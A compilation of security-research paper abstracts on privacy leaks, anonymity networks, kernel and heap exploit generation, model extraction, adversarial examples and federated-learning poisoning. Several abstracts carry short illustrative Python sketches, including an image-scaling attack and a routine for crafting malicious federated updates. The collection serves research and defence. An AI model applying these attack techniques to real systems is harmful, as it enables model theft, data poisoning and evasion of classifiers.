Identifying privacy-sensitive data leaks by mobile applications has been a topic of great research interest for the past decade. Technically, such data flows are not “leaks” if they are disclosed in a privacy policy. To address this limitation in automated analysis, recent work has combined program analysis of applications with analysis of privacy policies to determine the flow-to-policy consistency, and hence violations thereof. However, this prior work has a fundamental weakness: it does not differentiate the entity (e.g., first-party vs. third-party) receiving the privacy-sensitive data. In this paper, we propose POLICHECK, which formalizes and implements an entity-sensitive flow-to-policy consistency model. We use POLICHECK to study 13,796 applications and their privacy policies and find that up to 42.4% of applications either incorrectly disclose or omit disclosing their privacy-sensitive data flows. Our results also demonstrate the significance of considering entities: without considering entity, prior approaches would falsely classify up to 38.4% of applications as having privacy-sensitive data flows consistent with their privacy policies. These false classifications include data flows to third-parties that are omitted (e.g., the policy states only the first-party collects the data type), incorrect (e.g., the policy states the third-party does not collect the data type), and ambiguous (e.g., the policy has conflicting statements about the data type collection). By defining a novel automated, entity-sensitive flow-to-policy consistency analysis, POLICHECK provides the highest-precision method to date to determine if applications properly disclose their privacy-sensitive behaviors.

Walking Onions: Scaling Anonymity Networks while Protecting Users

Scaling anonymity networks offers unique security challenges, as attackers can exploit differing views of the network’s topology to perform epistemic and route capture attacks. Anonymity networks in practice, such as Tor, have opted for security over scalability by requiring participants to share a globally consistent view of all relays to prevent these kinds of attacks. Such an approach requires each user to maintain up-to-date information about every relay, causing the total amount of data each user must download every epoch to scale linearly with the number of relays. As the number of clients increases, more relays must be added to provide bandwidth, further exacerbating the total load on the network.

In this work, we present Walking Onions, a set of protocols improving scalability for anonymity networks. Walking Onions enables constant-size scaling of the information each user must download in every epoch, even as the number of relays in the network grows. Furthermore, we show how relaxing the clients’ bandwidth growth from constant to logarithmic can enable an outsized improvement to relays’ bandwidth costs. Notably, Walking Onions offers the same security properties as current designs that require a globally consistent network view. We present two protocol variants. The first requires minimal changes from current onion-routing systems. The second presents a more significant design change, thereby reducing the latency required to establish a path through the network while providing better forward secrecy than previous such constructions. We implement and evaluate Walking Onions in a simulated onion-routing anonymity network modelled after Tor, and validate that Walking Onions indeed offers significant scalability improvements for networks at or above the size of the current Tor network.

Differentially-Private Control-Flow Node Coverage for Software Usage Analysis

There are significant privacy concerns about the collection of usage data from deployed software. We propose a novel privacy-preserving solution for a problem of central importance to software usage analysis: control-flow graph coverage analysis over many deployed software instances. Our solution employs the machinery of differential privacy and its generalizations, and develops the following technical contributions: (1) a new notion of privacy guarantees based on a neighbor relation between control-flow graphs that prevents causality-based inference, (2) a new differentially-private algorithm design based on a novel definition of sensitivity with respect to differences between neighbors, (3) an efficient implementation of the algorithm using dominator trees derived from control-flow graphs, (4) a pruning approach to reduce the noise level by tightening the sensitivity bound using restricted sensitivity, and (5) a refined notion of relaxed indistinguishability based on distances between neighbors. Our evaluation demonstrates that these techniques can achieve practical accuracy while providing principled privacy-by-design guarantees.
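
As a rough illustration of the privacy machinery involved (a minimal sketch of the classic Laplace-mechanism pattern applied to aggregated node-coverage counts; this is not the paper's dominator-tree algorithm, and all names below are mine):

```python
import math
import random

def dp_node_coverage(instance_coverages, epsilon, sensitivity):
    """Aggregate CFG-node coverage across deployed instances, then add
    Laplace noise calibrated to a sensitivity bound (the paper's pruning
    step is about tightening exactly this bound)."""
    totals = {}
    for cov in instance_coverages:          # cov: set of covered node ids
        for node in cov:
            totals[node] = totals.get(node, 0) + 1
    scale = sensitivity / epsilon
    noisy = {}
    for node, count in totals.items():
        u = random.random() - 0.5           # Laplace(0, scale) via inverse CDF
        noise = -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))
        noisy[node] = count + noise
    return noisy
```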

Visor: Privacy-Preserving Video Analytics as a Cloud Service

Video-analytics-as-a-service is becoming an important offering for cloud providers. A key concern in such services is privacy of the videos being analyzed. While trusted execution environments (TEEs) are promising options for preventing the direct leakage of private video content, they remain vulnerable to side-channel attacks.

We present Visor, a system that provides confidentiality for the user’s video stream as well as the ML models in the presence of a compromised cloud platform and untrusted co-tenants. Visor executes video pipelines in a hybrid TEE that spans both the CPU and GPU. It protects the pipeline against side-channel attacks induced by data-dependent access patterns of video modules, and also addresses leakage in the CPU-GPU communication channel. Visor is up to 1000× faster than naïve oblivious solutions, and its overheads relative to a non-oblivious baseline are limited to 2×–6×.
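
The data-oblivious building block underneath such pipelines can be shown in a few lines (a sketch of the general pattern only; Visor itself implements oblivious video modules in native code inside the TEE):

```python
def oblivious_select(cond_bit, a, b):
    """Return a if cond_bit == 1 else b, without a secret-dependent branch:
    the same instructions execute either way, which is the property that
    defeats access-pattern side channels. cond_bit must be 0 or 1."""
    mask = -cond_bit                 # 0 -> ...000, 1 -> ...111 (two's complement)
    return (a & mask) | (b & ~mask)

assert oblivious_select(1, 7, 9) == 7 and oblivious_select(0, 7, 9) == 9
```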

DELF: Safeguarding deletion correctness in Online Social Networks

Deletion is a core facet of Online Social Networks (OSNs). For users, deletion is a tool to remove what they have shared and control their data. For OSNs, robust deletion is both an obligation to their users and a risk when developer mistakes inevitably occur. While developers are effective at identifying high-level deletion requirements in products (e.g., users should be able to delete posted photos), they are less effective at mapping high-level requirements into concrete operations (e.g., deleting all relevant items in data stores). Without framework support, developer mistakes lead to violations of users’ privacy, such as retaining data that should be deleted, deleting the wrong data, and exploitable vulnerabilities.

We propose DELF, a deletion framework for modern OSNs. In DELF, developers specify deletion annotations on data type definitions, which the framework maps into asynchronous, reliable and temporarily reversible operations on backing data stores. DELF validates annotations both statically and dynamically, proactively flagging errors and suggesting fixes.
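
A hypothetical flavour of such annotations (the sketch below is my own invention, not DELF's actual syntax, which targets Facebook's internal data definitions):

```python
from dataclasses import dataclass, field

# Hypothetical edge annotations: what to do with referenced data when
# this object is deleted.
DEEP = "deep"        # also delete the object on the other end of the edge
SHALLOW = "shallow"  # only remove the reference itself

@dataclass
class Photo:
    id: int
    comment_ids: list = field(default_factory=list,
                              metadata={"on_delete": DEEP})   # comments die with the photo
    album_id: int = field(default=0,
                          metadata={"on_delete": SHALLOW})    # album merely loses a member
```

A framework in this spirit would walk `dataclasses.fields(Photo)` and map each annotation to the asynchronous, reversible store operations the paper describes.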

We deployed DELF in three distinct OSNs, showing the feasibility of our approach. DELF detected, surfaced, and helped developers correct thousands of omissions and dozens of mistakes, while also enabling timely recovery in tens of incidents where user data was inadvertently deleted.

Software Security

Datalog Disassembly

Disassembly is fundamental to binary analysis and rewriting. We present a novel disassembly technique that takes a stripped binary and produces reassembleable assembly code. The resulting assembly code has accurate symbolic information, providing cross-references for analysis and to enable adjustment of code and data pointers to accommodate rewriting. Our technique features multiple static analyses and heuristics in a combined Datalog implementation. We argue that Datalog’s inference process is particularly well suited for disassembly and the required analyses. Our implementation and experiments support this claim. We have implemented our approach into an open-source tool called Ddisasm. In extensive experiments in which we rewrite thousands of x64 binaries we find Ddisasm is both faster and more accurate than the current state-of-the-art binary reassembling tool, Ramblr.
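
The flavour of Datalog-style inference can be conveyed with a toy fixpoint (Ddisasm's real rule set is far richer; the two rules in the docstring are illustrative only):

```python
def infer_code(valid_instr, entry_points, successors):
    """Toy fixpoint for two Datalog-ish rules:
         code(A) :- entry(A), valid_instr(A).
         code(B) :- code(A), successor(A, B), valid_instr(B)."""
    code, worklist = set(), list(entry_points)
    while worklist:
        addr = worklist.pop()
        if addr in code or addr not in valid_instr:
            continue
        code.add(addr)
        worklist.extend(successors.get(addr, ()))
    return code

# e.g. infer_code({0, 2, 5, 9}, [0], {0: [2], 2: [5, 7], 5: [9]}) -> {0, 2, 5, 9}
```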

KOOBE: Towards Facilitating Exploit Generation of Kernel Out-Of-Bounds Write Vulnerabilities

The monolithic nature of modern OS kernels leads to a constant stream of bugs being discovered. It is often unclear which of these bugs are worth fixing, as only a subset of them may be serious enough to lead to security takeovers (i.e., privilege escalations). Therefore, researchers have recently started to develop automated exploit generation techniques (for UAF bugs) to assist the bug triage process. In this paper, we investigate another top memory vulnerability in Linux kernel—out-of-bounds (OOB) memory write from heap. We design KOOBE to assist the analysis of such vulnerabilities based on two observations: (1) Surprisingly often, different OOB vulnerability instances exhibit a wide range of capabilities. (2) Kernel exploits are multi-interaction in nature (i.e., multiple syscalls are involved in an exploit), which allows the exploit crafting process to be modular. Specifically, we focus on the extraction of capabilities of an OOB vulnerability which will feed the subsequent exploitability evaluation process. Our system builds on several building blocks, including a novel capability-guided fuzzing solution to uncover hidden capabilities, and a way to compose capabilities together to further enhance the likelihood of successful exploitations. In our evaluation, we demonstrate the applicability of KOOBE by exhaustively analyzing the 17 most recent Linux kernel OOB vulnerabilities (where only 5 of them have publicly available exploits), for which KOOBE successfully generated candidate exploit strategies for 11 of them (including 5 that do not even have any CVEs assigned). Subsequently from these strategies, we are able to construct fully working exploits for all of them.

Automatic Techniques to Systematically Discover New Heap Exploitation Primitives

Exploitation techniques that abuse the metadata of heap allocators have been widely studied because of their generality (i.e., application independence) and power (i.e., bypassing modern mitigations). However, such techniques are commonly considered an art, and thus the ways to discover them remain ad-hoc, manual, and allocator-specific.

In this paper, we present an automatic tool, ArcHeap, to systematically discover the unexplored heap exploitation primitives, regardless of their underlying implementations. The key idea of ArcHeap is to let the computer autonomously explore the spaces, similar in concept to fuzzing, by specifying a set of common designs of modern heap allocators and root causes of vulnerabilities as models, and by providing heap operations and attack capabilities as actions. During the exploration, ArcHeap checks whether the combinations of these actions can be potentially used to construct exploitation primitives, such as arbitrary write or overlapped chunks. As a proof, ArcHeap generates working PoC that demonstrates the discovered exploitation technique.

We evaluated ArcHeap with ptmalloc2 and 10 other allocators, and discovered five previously unknown exploitation techniques in ptmalloc2 as well as several techniques against seven out of 10 allocators including the security-focused allocator, DieHarder. To show the effectiveness of ArcHeap’s approach in other domains, we also studied how security features and exploit primitives evolve across different versions of ptmalloc2.
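
One of the primitives ArcHeap searches for, overlapping chunks, is easy to state as a check over the allocator's live-chunk layout (a sketch only; the actual tool drives real allocators with random action sequences and shadow memory):

```python
def find_overlap(live_chunks):
    """live_chunks: list of (addr, size) pairs the allocator believes are
    simultaneously live. Any overlap is evidence of an 'overlapping chunk'
    exploitation primitive."""
    chunks = sorted(live_chunks)
    for (a1, n1), (a2, n2) in zip(chunks, chunks[1:]):
        if a1 + n1 > a2:                # chunk 1 extends into chunk 2
            return (a1, n1), (a2, n2)
    return None

# A driver would repeatedly pick random actions (malloc, free, overflow,
# write-after-free, ...) against the target allocator, call find_overlap
# after every step, and emit the triggering action sequence as a PoC.
```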

The Industrial Age of Hacking

There is a cognitive bias in the hacker community to select a piece of software and invest significant human resources into finding bugs in that software without any prior indication of success. We label this strategy depth-first search and propose an alternative: breadth-first search. In breadth-first search, humans perform minimal work to enable automated analysis on a range of targets before committing additional time and effort to research any particular one.

We present a repeatable human study that leverages teams of varying skill while using automation to the greatest extent possible. Our goal is a process that is effective at finding bugs; has a clear plan for the growth, coaching, and efficient use of team members; and supports measurable, incremental progress. We derive an assembly-line process that improves on what was once intricate, manual work. Our work provides evidence that the breadth-first approach increases the effectiveness of teams.

BScout: Direct Whole Patch Presence Test for Java Executables

To protect end-users and software from known vulnerabilities, it is crucial to apply security patches to affected executables in a timely manner. To this end, patch presence tests have been proposed, with the capability of independently investigating patch application status on a target without source code. Existing work on patch presence testing adopts a signature-based approach. To balance the uniqueness and the stability of the signature, existing work is limited to using a small and localized patch snippet (instead of the whole patch) for signature generation, and is therefore inherently unreliable.

In light of this, we present BScout, which directly checks the presence of a whole patch in Java executables without generating signatures. BScout features several new techniques to bridge the semantic gap between source code and bytecode instructions during the testing, and accurately checks the fine-grained patch semantics in the whole target executable. We evaluate BScout with 194 CVEs from the Android framework and third-party libraries. The results show that it achieves remarkable accuracy with and without line number information (i.e., debug information) presented in a target executable. We further apply BScout to perform a large-scale patch application practice study with 2,506 Android system images from 7 vendors. Our study reveals many findings that have not yet been reported.

MVP: Detecting Vulnerabilities using Patch-Enhanced Vulnerability Signatures

Recurring vulnerabilities widely exist and remain undetected in real-world systems; they often result from reused code bases or shared code logic. However, the potentially small differences between vulnerable functions and their patched functions, as well as the possibly large differences between vulnerable functions and the target functions to be detected, pose challenges for clone-based and function-matching-based approaches to identifying these recurring vulnerabilities, causing high false positives and false negatives.

In this paper, we propose a novel approach to detect recurring vulnerabilities with low false positives and low false negatives. We first use our novel program slicing to extract vulnerability and patch signatures from vulnerable function and its patched function at syntactic and semantic levels. Then a target function is identified as potentially vulnerable if it matches the vulnerability signature but does not match the patch signature. We implement our approach in a tool named MVP. Our evaluation on ten open-source systems has shown that, i) MVP significantly outperformed state-of-the-art clone-based and function matching-based recurring vulnerability detection approaches; ii) MVP detected recurring vulnerabilities that cannot be detected by general-purpose vulnerability detection approaches, i.e., two learning-based approaches and two commercial tools; and iii) MVP has detected 97 new vulnerabilities with 23 CVE identifiers assigned.
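
The decision rule stated in the abstract fits in one line; the set representation below is my simplification (real signatures are extracted by program slicing and matched at syntactic and semantic levels):

```python
def is_recurring_vuln(target_sig, vuln_sig, patch_sig):
    """MVP's core decision, radically simplified: flag the target function
    as potentially vulnerable iff it matches the vulnerability signature
    but not the patch signature. Signatures here are plain sets of
    normalized slice statements."""
    return vuln_sig <= target_sig and not (patch_sig <= target_sig)
```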

Machine Learning 1

Updates-Leak: Data Set Inference and Reconstruction Attacks in Online Learning

Machine learning (ML) has progressed rapidly during the past decade, and a major factor driving this development is the availability of unprecedentedly large-scale data. As data generation is a continuous process, ML model owners update their models frequently with newly-collected data in an online learning scenario. As a consequence, if an ML model is queried with the same set of data samples at two different points in time, it will provide different results.

In this paper, we investigate whether the change in the output of a black-box ML model before and after being updated can leak information of the dataset used to perform the update, namely the updating set. This constitutes a new attack surface against black-box ML models and such information leakage may compromise the intellectual property and data privacy of the ML model owner. We propose four attacks following an encoder-decoder formulation, which allows inferring diverse information of the updating set. Our new attacks are facilitated by state-of-the-art deep learning techniques. In particular, we propose a hybrid generative model (CBM-GAN) that is based on generative adversarial networks (GANs) but includes a reconstructive loss that allows reconstructing accurate samples. Our experiments show that the proposed attacks achieve strong performance.
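
The attacker's observable is exactly the before/after output difference; a minimal sketch of how it might be assembled (the encoder-decoder that consumes this vector, and the names used here, are not from the paper):

```python
import numpy as np

def attack_input(model_before, model_after, probe_set):
    """Updates-Leak's observable, simplified: query a fixed probe set
    before and after the update and concatenate the posterior differences
    into one vector, which the attacker's encoder-decoder then inverts."""
    return np.concatenate([model_after(x) - model_before(x) for x in probe_set])
```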

Exploring Connections Between Active Learning and Model Extraction

Machine learning is being increasingly used by individuals, research institutions, and corporations. This has resulted in the surge of Machine Learning-as-a-Service (MLaaS) - cloud services that provide (a) tools and resources to learn the model, and (b) a user-friendly query interface to access the model. However, such MLaaS systems raise privacy concerns such as model extraction. In model extraction attacks, adversaries maliciously exploit the query interface to steal the model. More precisely, in a model extraction attack, a good approximation of a sensitive or proprietary model held by the server is extracted (i.e. learned) by a dishonest user who interacts with the server only via the query interface. This attack was introduced by Tramèr et al. at the 2016 USENIX Security Symposium, where practical attacks for various models were shown. We believe that better understanding the efficacy of model extraction attacks is paramount to designing secure MLaaS systems. To that end, we take the first step by (a) formalizing model extraction and discussing possible defense strategies, and (b) drawing parallels between model extraction and the established area of active learning. In particular, we show that recent advancements in the active learning domain can be used to implement powerful model extraction attacks and investigate possible defense strategies.

Hybrid Batch Attacks: Finding Black-box Adversarial Examples with Limited Queries

We study adversarial examples in a black-box setting where the adversary only has API access to the target model and each query is expensive. Prior work on black-box adversarial examples follows one of two main strategies: (1) transfer attacks use white-box attacks on local models to find candidate adversarial examples that transfer to the target model, and (2) optimization-based attacks use queries to the target model and apply optimization techniques to search for adversarial examples. We propose hybrid attacks that combine both strategies, using candidate adversarial examples from local models as starting points for optimization-based attacks and using labels learned in optimization-based attacks to tune local models for finding transfer candidates. We empirically demonstrate on the MNIST, CIFAR10, and ImageNet datasets that our hybrid attack strategy reduces cost and improves success rates. We also introduce a seed prioritization strategy which enables attackers to focus their resources on the most promising seeds. Combining hybrid attacks with our seed prioritization strategy enables batch attacks that can reliably find adversarial examples with only a handful of queries.
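
The control flow of the hybrid strategy is simple to sketch (the callables are supplied by the caller; the feedback loop that retunes local models on observed labels is omitted):

```python
def hybrid_attack(local_attack, query_attack, target_label_fn, seeds):
    """White-box attacks on local models produce transfer candidates;
    candidates that fail to transfer become warm starting points for the
    query-based optimization attack on the target."""
    adversarial = []
    for x, y_true in seeds:
        candidate = local_attack(x)                      # white-box, local model
        if target_label_fn(candidate) != y_true:
            adversarial.append(candidate)                # transferred directly
        else:
            adversarial.append(query_attack(candidate))  # optimize from warm start
    return adversarial
```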

High Accuracy and High Fidelity Extraction of Neural Networks

In a model extraction attack, an adversary steals a copy of a remotely deployed machine learning model, given oracle prediction access. We taxonomize model extraction attacks around two objectives: accuracy, i.e., performing well on the underlying learning task, and fidelity, i.e., matching the predictions of the remote victim classifier on any input.

To extract a high-accuracy model, we develop a learning-based attack exploiting the victim to supervise the training of an extracted model. Through analytical and empirical arguments, we then explain the inherent limitations that prevent any learning-based strategy from extracting a truly high-fidelity model—i.e., extracting a functionally-equivalent model whose predictions are identical to those of the victim model on all possible inputs. Addressing these limitations, we expand on prior work to develop the first practical functionally-equivalent extraction attack for direct extraction (i.e., without training) of a model’s weights.

We perform experiments both on academic datasets and a state-of-the-art image classifier trained with 1 billion proprietary images. In addition to broadening the scope of model extraction research, our work demonstrates the practicality of model extraction attacks against production-grade systems.
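
The accuracy-oriented attack reduces to a very small loop (a sketch; the paper's functionally-equivalent attack recovers weights directly rather than training):

```python
def learning_based_extraction(victim_predict, fit_student, unlabeled_pool):
    """Label a pool of inputs with the victim's predictions and train a
    student on them. This can yield high accuracy, but, as the paper
    argues, no learning-based loop can guarantee high fidelity."""
    return fit_student([(x, victim_predict(x)) for x in unlabeled_pool])
```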

Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning

Machine learning has made remarkable progress in the last years, yet its success has been overshadowed by different attacks that can thwart its correct operation. While a large body of research has studied attacks against learning algorithms, vulnerabilities in the preprocessing for machine learning have received little attention so far. An exception is the recent work of Xiao et al. that proposes attacks against image scaling. In contrast to prior work, these attacks are agnostic to the learning algorithm and thus impact the majority of learning-based approaches in computer vision. The mechanisms underlying the attacks, however, are not understood yet, and hence their root cause remains unknown.

In this paper, we provide the first in-depth analysis of image-scaling attacks. We theoretically analyze the attacks from the perspective of signal processing and identify their root cause as the interplay of downsampling and convolution. Based on this finding, we investigate three popular imaging libraries for machine learning (OpenCV, TensorFlow, and Pillow) and confirm the presence of this interplay in different scaling algorithms. As a remedy, we develop a novel defense against image-scaling attacks that prevents all possible attack variants. We empirically demonstrate the efficacy of this defense against non-adaptive and adaptive adversaries.
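
The downsampling/convolution root cause is easiest to see in the attack itself: only the sparse set of pixels the scaler samples needs to change. A sketch for nearest-neighbor scaling (the index arithmetic approximates one common convention; real libraries differ in half-pixel offsets):

```python
import numpy as np

def scaling_attack_nearest(src, target):
    """Overwrite exactly the pixels a nearest-neighbor downscaler samples,
    so that scaling the result yields `target` while the full-size image
    still looks like `src`. Assumes target is smaller than src."""
    atk = src.copy()
    h, w = src.shape[:2]
    oh, ow = target.shape[:2]
    for i in range(oh):
        for j in range(ow):
            atk[i * h // oh, j * w // ow] = target[i, j]
    return atk
```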

TextShield: Robust Text Classification Based on Multimodal Embedding and Neural Machine Translation

Text-based toxic content detection is an important tool for reducing harmful interactions in online social media environments. Yet, its underlying mechanism, deep learning-based text classification (DLTC), is inherently vulnerable to maliciously crafted adversarial texts. To mitigate such vulnerabilities, intensive research has been conducted on strengthening English-based DLTC models. However, the existing defenses are not effective for Chinese-based DLTC models, due to the unique sparseness, diversity, and variation of the Chinese language.

In this paper, we bridge this striking gap by presenting TextShield, a new adversarial defense framework specifically designed for Chinese-based DLTC models. TextShield differs from previous work in several key aspects: (i) generic – it applies to any Chinese-based DLTC models without requiring re-training; (ii) robust – it significantly reduces the attack success rate even under the setting of adaptive attacks; and (iii) accurate – it has little impact on the performance of DLTC models over legitimate inputs. Extensive evaluations show that it outperforms both existing methods and the industry-leading platforms. Future work will explore its applicability in broader practical tasks.

Financial Tech and Voting

Security Analysis of Unified Payments Interface and Payment Apps in India

Since 2016, with a strong push from the Government of India, smartphone-based payment apps have become mainstream, with over $50 billion transacted through these apps in 2018. Many of these apps use a common infrastructure introduced by the Indian government, called the Unified Payments Interface (UPI), but there has been no security analysis of this critical piece of infrastructure that supports money transfers. This paper uses a principled methodology to do a detailed security analysis of the UPI protocol by reverse-engineering the design of this protocol through seven popular UPI apps. We discover previously-unreported multi-factor authentication design-level flaws in the UPI 1.0 specification that can lead to significant attacks when combined with an installed attacker-controlled application. In an extreme version of the attack, the flaws could allow a victim’s bank account to be linked and emptied, even if a victim had never used a UPI app. The potential attacks were scalable and could be done remotely. We discuss our methodology and detail how we overcame challenges in reverse-engineering this unpublished application layer protocol, including that all UPI apps undergo a rigorous security review in India and are designed to resist analysis. The work resulted in several CVEs, and a key attack vector that we reported was later addressed in UPI 2.0.

Cardpliance: PCI DSS Compliance of Android Applications

Smartphones and their applications have become a predominant way of computing, and it is only natural that they have become an important part of financial transaction technology. However, applications asking users to enter credit card numbers have been largely overlooked by prior studies, which frequently report pervasive security and privacy concerns in the general mobile application ecosystem. Such applications are particularly security-sensitive, and they are subject to the Payment Card Industry Data Security Standard (PCI DSS). In this paper, we design a tool called Cardpliance, which bridges the semantics of the graphical user interface with static program analysis to capture relevant requirements from PCI DSS. We use Cardpliance to study 358 popular applications from Google Play that ask the user to enter a credit card number. Overall, we found that 1.67% of the 358 applications are not compliant with PCI DSS, with vulnerabilities including improperly storing credit card numbers and card verification codes. These findings paint a largely positive picture of the state of PCI DSS compliance of popular Android applications.

The Ballot is Busted Before the Blockchain: A Security Analysis of Voatz, the First Internet Voting Application Used in U.S. Federal Elections

In the 2018 midterm elections, West Virginia became the first state in the U.S. to allow select voters to cast their ballot on a mobile phone via a proprietary app called “Voatz.” Although there is no public formal description of Voatz’s security model, the company claims that election security and integrity are maintained through the use of a permissioned blockchain, biometrics, a mixnet, and hardware-backed key storage modules on the user’s device. In this work, we present the first public security analysis of Voatz, based on a reverse engineering of their Android application and the minimal available documentation of the system. We performed a cleanroom reimplementation of Voatz’s server and present an analysis of the election process as visible from the app itself.

We find that Voatz has vulnerabilities that allow different kinds of adversaries to alter, stop, or expose a user’s vote, including a side-channel attack in which a completely passive network adversary can potentially recover a user’s secret ballot. We additionally find that Voatz has a number of privacy issues stemming from their use of third-party services for crucial app functionality. Our findings serve as a concrete illustration of the common wisdom against Internet voting, and of the importance of transparency to the legitimacy of elections. As a result of our work, West Virginia and one county in Washington have already aborted their use of Voatz in the 2020 primaries.

VoteAgain: A scalable coercion-resistant voting system

The strongest threat model for voting systems considers coercion resistance: protection against coercers that force voters to modify their votes, or to abstain. Existing remote voting systems either do not provide this property; require expensive operations for tallying; or burden users with the need to store cryptographic key material and with the responsibility to deceive their coercers. We propose VoteAgain, a scalable voting scheme that relies on the revoting paradigm to provide coercion resistance. VoteAgain uses a novel deterministic ballot padding mechanism to ensure that coercers cannot see whether a vote has been replaced. This mechanism ensures tallying takes quasilinear time, making VoteAgain the first revoting scheme that can handle elections with millions of voters. We prove that VoteAgain provides ballot privacy, coercion resistance, and verifiability; and we demonstrate its scalability using a prototype implementation of its core cryptographic primitives.

Boxer: Preventing fraud by scanning credit cards

Card-not-present credit card fraud costs businesses billions of dollars a year. In this paper, we present Boxer, a mobile SDK and server that enables apps to combat card-not-present fraud by scanning cards and verifying that they are genuine. Boxer analyzes the images from these scans, looking for tell-tale signs of attacks, and introduces a novel abstraction on top of modern security hardware for complementary protection.

Currently, 323 apps have integrated Boxer, and tens of them have deployed it to production, including some large, popular, and international apps, resulting in Boxer scanning over 10 million real cards already. Our evaluation of Boxer from one of these deployments shows ten cases of real attacks that our novel hardware-based abstraction detects. Additionally, from the same deployment, without letting in any fraud, Boxer’s card scanning recovers 89% of the good users whom the app would have blocked. In another evaluation of Boxer, we run our image analysis models against images from real users and show an accuracy of 96% and 100% on the two models that we use.

Machine Learning 2

Fawkes: Protecting Privacy against Unauthorized Deep Learning Models

Today’s proliferation of powerful facial recognition systems poses a real threat to personal privacy. As Clearview.ai demonstrated, anyone can canvass the Internet for data and train highly accurate facial recognition models of individuals without their knowledge. We need tools to protect ourselves from potential misuses of unauthorized facial recognition systems. Unfortunately, no practical or effective solutions exist.

In this paper, we propose Fawkes, a system that helps individuals inoculate their images against unauthorized facial recognition models. Fawkes achieves this by helping users add imperceptible pixel-level changes (we call them “cloaks”) to their own photos before releasing them. When used to train facial recognition models, these “cloaked” images produce functional models that consistently cause normal images of the user to be misidentified. We experimentally demonstrate that Fawkes provides 95+% protection against user recognition regardless of how trackers train their models. Even when clean, uncloaked images are “leaked” to the tracker and used for training, Fawkes can still maintain an 80+% protection success rate. We achieve 100% success in experiments against today’s state-of-the-art facial recognition services. Finally, we show that Fawkes is robust against a variety of countermeasures that try to detect or disrupt image cloaks.
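
A sketch of what a cloaking objective of this kind might look like (my formulation, not Fawkes's exact loss; the paper uses a perceptual budget, for which a crude L2 penalty stands in here):

```python
def cloak_objective(feature_extractor, x, x_cloaked, target_features, lam=1.0):
    """Pull the cloaked photo's feature-space representation toward a
    *different* identity's features while penalizing visible pixel change;
    models trained on cloaked photos then misplace the user in feature space."""
    feature_shift = ((feature_extractor(x_cloaked) - target_features) ** 2).sum()
    visibility = ((x_cloaked - x) ** 2).sum()
    return feature_shift + lam * visibility
```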

Stolen Memories: Leveraging Model Memorization for Calibrated White-Box Membership Inference

Membership inference (MI) attacks exploit the fact that machine learning algorithms sometimes leak information about their training data through the learned model. In this work, we study membership inference in the white-box setting in order to exploit the internals of a model, which have not been effectively utilized by previous work. Leveraging new insights about how overfitting occurs in deep neural networks, we show how a model’s idiosyncratic use of features can provide evidence for membership to white-box attackers—even when the model’s black-box behavior appears to generalize well—and demonstrate that this attack outperforms prior black-box methods. Taking the position that an effective attack should have the ability to provide confident positive inferences, we find that previous attacks do not often provide a meaningful basis for confidently inferring membership, whereas our attack can be effectively calibrated for high precision. Finally, we examine popular defenses against MI attacks, finding that (1) smaller generalization error is not sufficient to prevent attacks on real models, and (2) while small-ϵ-differential privacy reduces the attack’s effectiveness, this often comes at a significant cost to the model’s accuracy; and for larger ϵ that are sometimes used in practice (e.g., ϵ=16), the attack can achieve nearly the same accuracy as on the unprotected model.

Local Model Poisoning Attacks to Byzantine-Robust Federated Learning

In federated learning, multiple client devices jointly learn a machine learning model: each client device maintains a local model for its local training dataset, while a master device maintains a global model via aggregating the local models from the client devices. The machine learning community recently proposed several federated learning methods that were claimed to be robust against Byzantine failures (e.g., system failures, adversarial manipulations) of certain client devices. In this work, we perform the first systematic study on local model poisoning attacks to federated learning. We assume an attacker has compromised some client devices, and the attacker manipulates the local model parameters on the compromised client devices during the learning process such that the global model has a large testing error rate. We formulate our attacks as optimization problems and apply our attacks to four recent Byzantine-robust federated learning methods. Our empirical results on four real-world datasets show that our attacks can substantially increase the error rates of the models learnt by the federated learning methods that were claimed to be robust against Byzantine failures of some client devices. We generalize two defenses for data poisoning attacks to defend against our local model poisoning attacks. Our evaluation results show that one defense can effectively defend against our attacks in some cases, but the defenses are not effective enough in other cases, highlighting the need for new defenses against our local model poisoning attacks to federated learning.
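
To make the setting concrete, here is one of the attacked robust rules plus a naive flavour of the directed-deviation idea (the paper solves a per-rule optimization; the crafting function below is a deliberately crude stand-in):

```python
import numpy as np

def trimmed_mean(updates, k):
    """Coordinate-wise trimmed mean, one Byzantine-robust aggregation rule:
    drop the k largest and k smallest values per coordinate, then average."""
    arr = np.sort(np.stack(updates), axis=0)
    return arr[k:len(updates) - k].mean(axis=0)

def craft_malicious_updates(benign_updates, n_malicious, eps=1e-3):
    """Push every coordinate just past the benign extremes, opposite to the
    benign mean direction, so the aggregate drifts the wrong way."""
    stacked = np.stack(benign_updates)
    direction = -np.sign(stacked.mean(axis=0))
    extreme = np.where(direction > 0, stacked.max(axis=0), stacked.min(axis=0))
    return [extreme + direction * eps] * n_malicious
```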

Justinian’s GAAvernor: Robust Distributed Learning with Gradient Aggregation Agent

The hidden vulnerability of distributed learning systems against Byzantine attacks has been investigated by recent research and, fortunately, some known defenses have shown the ability to mitigate Byzantine attacks when a minority of workers are under adversarial control. Yet, our community still has very little knowledge of how to handle situations where the proportion of malicious workers is 50% or more. Based on our preliminary study of this open challenge, we find there is more that can be done to restore Byzantine robustness in these more threatening situations, if we better utilize the auxiliary information inside the learning process.

In this paper, we propose Justinian’s GAAvernor (GAA), a Gradient Aggregation Agent which learns to be robust against Byzantine attacks via reinforcement learning techniques. Basically, GAA relies on utilizing the historical interactions with the workers as experience and a quasi-validation set, a small dataset that consists of fewer than 10 data samples from similar data domains, to generate reward signals for policy learning. As a complement to existing defenses, our proposed approach does not bound the expected number of malicious workers and is proved to be robust in more challenging scenarios.

Through extensive evaluations on four benchmark systems and against various adversarial settings, our proposed defense shows desirable robustness as if the systems were under no attacks, even in some cases where 90% of the workers are controlled by the adversary. Meanwhile, our approach shows a similar level of time efficiency compared with the state-of-the-art defenses. Moreover, GAA provides highly interpretable traces of worker behavior as by-products for further mitigation uses such as Byzantine worker detection and behavior pattern analysis.

Interpretable Deep Learning under Fire

Providing explanations for deep neural network (DNN) models is crucial for their use in security-sensitive domains. A plethora of interpretation models have been proposed to help users understand the inner workings of DNNs: how does a DNN arrive at a specific decision for a given input? The improved interpretability is believed to offer a sense of security by involving humans in the decision-making process. Yet, due to its data-driven nature, the interpretability itself is potentially susceptible to malicious manipulations, about which little is known thus far.

